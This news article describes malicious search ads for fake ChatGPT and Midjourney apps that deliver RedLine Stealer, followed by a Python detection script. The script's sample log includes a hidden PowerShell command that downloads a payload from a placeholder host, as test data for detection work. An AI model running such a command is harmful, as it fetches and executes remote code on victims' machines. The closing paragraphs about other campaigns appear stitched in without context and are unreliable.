Searching for AI Tools? Watch Out for Rogue Sites Distributing RedLine Malware

May 19, 2023 | Ravi Lakshmanan | Artificial Intelligence / Cyber Threat


Malicious Google search ads for generative AI services such as OpenAI ChatGPT and Midjourney are being used to lure users to sketchy websites as part of a BATLOADER campaign designed to deliver the RedLine Stealer malware.

“Both AI services are extremely popular but lack first-party standalone apps (i.e., users interface with ChatGPT through a web interface, while Midjourney uses Discord),” eSentire said in its analysis.

“This void is being exploited by attackers to entice people to create fake web pages promoting fake apps.”

BATLOADER is a loader malware propagated by drive-by downloads, where users searching for specific keywords in search engines are presented with deceptive advertisements that, when clicked, redirect to a malicious landing page that hosts the malware.

According to eSentire, the installer file contains an executable (ChatGPT.exe or Midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads RedLine Stealer from a remote server and loads it.

Once installed, the binary uses Microsoft Edge WebView2 to load chat.openai[.]com or www.midjourney[.]com (the legitimate ChatGPT and Midjourney URLs) in a popup window, so the victim sees the expected service and is less likely to become suspicious.
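The infection chain described above (a lure executable named after the AI service launching a PowerShell script that fetches the stealer) leaves a recognisable parent/child process pattern. The following detection sketch is an added example, not code from the article or from eSentire: it scans process-creation records for PowerShell spawned by the lure binaries named on the page, references to the named scripts, and download-cradle markers in the command line. The pipe-delimited log layout, the field names and the sample events (including the placeholder host) are constructed for illustration and are not a specific product's schema.

```python
"""Flag process-creation records matching the fake-AI-app installer chain.

Added example (not from the article or eSentire). Log format, field names
and sample events below are constructed; the file names come from the text.
"""
import re
from dataclasses import dataclass

# Indicators named in the article.
LURE_BINARIES = {"chatgpt.exe", "midjourney.exe"}
LURE_SCRIPTS = {"chat.ps1", "chat-ready.ps1"}

# Generic markers of a PowerShell download cradle (assumption: a reasonable
# starting set, not an exhaustive list).
DOWNLOAD_MARKERS = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|https?://)",
    re.IGNORECASE,
)


@dataclass
class Event:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> Event:
    """Parse a constructed 'Key=Value|Key=Value' process-creation record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return Event(
        fields.get("ParentImage", ""),
        fields.get("Image", ""),
        fields.get("CommandLine", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Event) -> list:
    """Return the list of reasons an event looks like the lure-to-PowerShell chain."""
    reasons = []
    parent = basename(event.parent_image)
    child = basename(event.image)
    cmd = event.command_line.lower()
    # Only PowerShell children are interesting; the WebView2 decoy window is not.
    if child.startswith("powershell") or child == "pwsh.exe":
        if parent in LURE_BINARIES:
            reasons.append(f"powershell spawned by lure binary {parent}")
        if any(script in cmd for script in LURE_SCRIPTS):
            reasons.append("references lure script name")
        if DOWNLOAD_MARKERS.search(event.command_line):
            reasons.append("download cradle in command line")
    return reasons


def scan(lines):
    """Return (image, reasons) for every record that triggers at least one reason."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            hits.append((event.image, reasons))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    r"ParentImage=C:\Users\alice\AppData\Local\Temp\ChatGPT.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\AppData\Local\Temp\Chat.ps1",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -Command Get-Process",
    r"ParentImage=C:\Users\alice\Downloads\Midjourney.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/payload.bin','C:\Users\alice\AppData\Local\Temp\payload.bin')",
    r"ParentImage=C:\Users\alice\Downloads\ChatGPT.exe|Image=C:\Users\alice\Downloads\msedgewebview2.exe|CommandLine=msedgewebview2.exe --app=https://chat.openai.com",
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_LOG):
        print(image, "->", "; ".join(reasons))
```

The last sample record shows why the rule keys on the PowerShell child rather than on the lure binary alone: the WebView2 popup that loads the genuine site is exactly the benign-looking activity the attackers rely on, and flagging it would only add noise.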


The attackers' use of ChatGPT- and Midjourney-themed lures in malicious ads, ultimately dropping the RedLine Stealer malware, was also highlighted by Trend Micro last week.


This isn’t the first time the operators behind BATLOADER have taken advantage of the AI craze to distribute malware. In March 2023, eSentire detailed a series of similar attacks that used ChatGPT lures to deploy Vidar Stealer and Ursnif.

The cybersecurity firm also noted that Google search ad abuse has declined from its peak in early 2023, suggesting the tech giant is taking aggressive steps to curb its abuse.


The findings indicate that OCX# targeted the cryptocurrency sector from December 2022 to March 2023 using More_eggs (aka Golden Chickens), a JavaScript downloader used to deliver additional payloads. The announcement came weeks after Securonix discovered a phishing campaign called HARVESTER.

In January, eSentire traced the identity of one of the leading Malware-as-a-Service (MaaS) operators to an individual in Montreal, Canada. A second attacker associated with this group was later found to be a Romanian going by the alias Jack.
